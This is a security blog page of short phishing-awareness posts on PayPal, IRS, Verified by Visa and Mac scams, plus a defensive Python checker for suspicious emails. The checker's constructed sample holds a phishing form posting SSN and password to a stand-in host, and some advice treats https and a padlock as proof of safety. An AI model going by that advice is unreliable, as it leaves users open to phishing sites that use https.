The Security Pub

Random Thoughts About Security

Phishing Scams are on the Rise

“Phishing” is the practice of sending spam or pop-up messages to lure unsuspecting recipients into volunteering personal, financial or credential-related information. That information can then be used to commit identity theft, or to enter password-protected sites using the victim's account. As phishing schemes become more sophisticated, it becomes increasingly important to be vigilant.

Learn more about how to spot a bogus phishing message, the important steps you can take to avoid getting “hooked,” and what to do if you’ve mistakenly responded to a phishing email with your personal information.

The “Dos, Don’ts and Nevers” of Phishing

  1. DO Delete suspicious messages immediately.
  2. DON’T click on any links in the message.
  3. Instead, DO copy and paste the URL into a new browser window.
  4. NEVER respond to an unsolicited email, or supply personal information as requested by an email, even if the message looks real.
  5. NEVER supply your passwords or other sensitive information via an email message. No legitimate organization should request your password or other types of sensitive information via an email message.

What to do if you’re compromised

If you believe you might have inadvertently revealed sensitive information such as your password, you should change your password immediately.

If you provided personal or financial account information that could be used for identity theft or fraud in response to a fraudulent e-mail claiming to come from an outside organization, you should immediately contact the company being spoofed.

Paypal Phishing Has Gone Multilingual

A recent report compiled by OpenDNS showed that 45 percent of all phishing attempts made in 2010 were targeting PayPal customers.

It is no wonder then that we witness PayPal phishing attempts on an almost daily basis. The latest one – spotted by Avira – comes in two flavors: English and French.

The e-mail itself is practically identical – the only difference is that the English version takes the victim to the phishing page via a link, while the French version employs a button. Even the reference number cited in the e-mail is the same.

The e-mail also contains security tips that, if followed, would thwart the phishers’ plans. I guess they thought the inclusion would make the e-mail look more legitimate, and decided to bet on the fact that many people simply ignore such advice and follow the offered link or button.

Form-Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast of the season’s important events, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks are just another type of phishing attack. Instead of using a link to take the user to a phishing site, the attacker includes a form in the email that the user is asked to complete. When the user completes and submits the form, the details are sent straight to the attacker. Here is a short video that shows an example.

ZBot Removal Tool

ZBot (also known as Zeus, ZeusBot or WSNPoem, Gorhax and Kneber) is a Trojan created to steal sensitive information from compromised computers. Zbot focuses mainly on the online banking information that unsuspecting users enter to access a financial organization's website; it also monitors system information to obtain additional authentication credentials. Some of the newer variants do even more: they gather browsing history and other data the user enters online, while at the same time taking screenshots.

To help with this, BitDefender has created a ZBot Removal Tool which checks users’ computers, and detects and eliminates most of the ZBot variants spotted in the wild.

Unsolicited Email Could Be A Potential Phishing Scam

This being tax season, I would like to remind you to remain cautious when receiving unsolicited emails, since these emails could be a phishing scam. Phishing scams may appear as a tax refund, an offer to assist in filing for a refund, or details about fake e-file websites. These email messages may appear to be from the IRS, directly ask users for personal information, contain a link the user is instructed to follow to a website requesting personal information, and/or contain harmful computer code.

  • NOTE: All IRS web page addresses begin with http://www.irs.gov. Phishing emails will have an address other than that, for example http://ww4.irs.gov.
  • I encourage you to take the following measures to protect yourself from phishing scams:
    • Do not follow unsolicited web links in email messages. Clicking a link in a phishing email typically takes you to a fake website. The phishing site is designed to look like the company’s real website.
    • If you receive a suspicious email I recommend you simply delete it.
    • Look for signs of security. Real corporate websites use secure, encrypted web pages any time their customers are asked to send personal and financial information over the internet. Look for https:// in the web address. The “s” stands for “secure”. Also, look for a locked padlock icon in the lower part of your browser window. The locked padlock icon indicates the site is encrypted, which means your data is protected when you send it over the Internet. If you don’t see these signs, then the site could be a scam.
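As an added example (not from the original post), the following Python script applies the checks described above, and in the form-based phishing section, to an HTML mail body: it compares each link's real host against the legitimate host, flags links that are not https, spots link text that shows one address while the target is another, and reports any form embedded in the mail. The mail body is constructed for the example and the legitimate-host set contains only the page's own example, www.irs.gov.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample (not a real message): the visible link text shows www.irs.gov
# while the real target is ww4.irs.gov, and an in-mail form posts the entered
# details straight to a third-party host, as in the form-based attacks described.
SAMPLE_BODY = """<p>Your refund is ready. Review it at
<a href="http://ww4.irs.gov/refund">http://www.irs.gov/refund</a></p>
<form action="http://collect.example.net/submit" method="post">
SSN: <input name="ssn"> Password: <input name="pw"></form>"""

LEGIT_HOSTS = {"www.irs.gov"}  # the page's own example; extend per brand

class LinkFormExtractor(HTMLParser):
    """Collect (href, visible text) for each anchor and the action of each form."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []
        self._href, self._text = None, []
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self._href, self._text = attrs["href"], []
        elif tag == "form":
            self.forms.append(attrs.get("action") or "")
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def assess(body, legit_hosts=LEGIT_HOSTS):
    """Return (reason, value) findings; an empty list means no check fired."""
    parser = LinkFormExtractor()
    parser.feed(body)
    findings = []
    for href, text in parser.links:
        target = urlsplit(href)
        host = target.hostname or ""
        if host not in legit_hosts:          # the "begins with www.irs.gov" check
            findings.append(("link host is not the real brand host", host))
        if target.scheme != "https":         # the "look for https://" check
            findings.append(("link is not https", href))
        if text.startswith("http") and urlsplit(text).hostname != host:
            findings.append(("displayed URL differs from real target", text))
    for action in parser.forms:              # form-based phishing: data leaves via the mail
        findings.append(("form inside the email posts data to", action))
    return findings
```

Running assess(SAMPLE_BODY) reports four findings, one for each of the checks above; a mail whose only link is https://www.irs.gov/ produces none.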

Here is a link to the IRS website that will answer some questions regarding phishing scams and how the IRS is working to help prevent you being the next victim.

Verified by Visa Phishing Scam

You should use some caution if you get an email asking you to join Verified by Visa over the next few weeks. Taking advantage of the holiday rush to shop online, the public awareness of the Verified by Visa brand, and the security it offers, criminals are pushing a Phishing scam that offers very little in the way of true protection.

Verified by Visa is a solid layer of security for your Visa card. It works alongside the fraud detection and purchase protection offered by the issuing bank. You register for it online during the checkout process at a participating Verified by Visa retailer: you enter the required information, create a password, and activate the Verified by Visa service. Once activated, you cannot use the Visa card online without the password. If you want to know more, the official FAQ for Verified by Visa is here.

According to Webroot, a new Phishing campaign is circulating that targets holiday shoppers online, using the Verified by Visa service name to lend credibility to the scam. This fake offer starts with an email inviting you to join the Verified by Visa program. From there you are linked to a Phishing site that is “clearly more professional, slick, and clean than most Phishing pages.” Webroot adds: “The form’s businesslike appearance serves to reassure the victim that the page really belongs to Visa.”

If you see this invitation, two things will stand out that are sure to ring warning bells. The first is the address used. While the email text will list one address, the actual address used in one example is vbvactivation-visa.com. This is not a legitimate Visa address.

Also, as mentioned, you register for the Verified by Visa service during the checkout process at a participating retailer. Visa would never send you random emails asking you to join. Another issue with the domain is that it uses HTTP and not HTTPS in the address. If you are dealing with Visa, and they need any type of information, they will always use HTTPS in the address field.

The second thing to scream fake and keep those warning bells ringing is that you are being asked for all kinds of personal information.

“In a real sign-up form for Verified by Visa, you won’t be asked to provide your mother’s maiden name, social security number, birthdates, or any other sensitive details that you wouldn’t otherwise enter into a Web-based order form while shopping online.”

It was also discovered that the domain used in the Phishing attack was registered to a Gmail account.

If you see emails that ask you to join the Verified by Visa program, forward them to phishing@visa.com and delete them. Under no circumstances should you follow links or open any attachments with them.

If by chance you get an email that claims to come from the bank that issued your Visa card, pick up the phone and call the bank, and give them nothing over email. The odds are this too is a scam, and the bank will know immediately.

New Mac Phishing Attack

An email is circulating which purports to relate to a recent Apple retail transaction and asks for details of any recent orders. The email also carries a compressed (“stuffed”) archive. This contains an ‘exe’ file, which will only launch on a Windows machine. The email reads: “We recorded a payment request from ‘Apple Inc.’ to enable the charge of $7,548.45 on your account.”
